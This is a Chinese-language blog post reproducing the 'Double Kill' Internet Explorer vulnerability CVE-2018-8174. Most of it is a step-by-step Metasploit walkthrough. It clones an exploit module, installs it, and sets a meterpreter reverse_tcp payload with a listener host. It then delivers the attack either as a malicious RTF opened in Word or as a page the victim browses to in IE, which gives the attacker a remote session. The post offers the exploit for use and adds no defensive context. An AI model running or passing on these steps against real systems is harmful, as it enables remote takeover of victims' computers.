双杀”0day漏洞(CVE-2018-8174)漏洞复现

  • 内容
  • 相关

0×01前言

该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。

0×02漏洞复现

在线下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git 

file

将CVE-2018-8174.rb复制到 fileformat 目录/

cd CVE-2018-8174-msf/
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

file

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.107.128
set lhost 192.168.107.128
exploit

file
1、进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

cd /root/.msf4/local/


file
file

2、IE浏览器打开 http://192.168.107.128:8080 即可获得会话

0×03 感谢支持。

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:双杀”0day漏洞(CVE-2018-8174)漏洞复现 - http://www.shungg.cn/post/221

发表评论

电子邮件地址不会被公开。 必填项已用*标注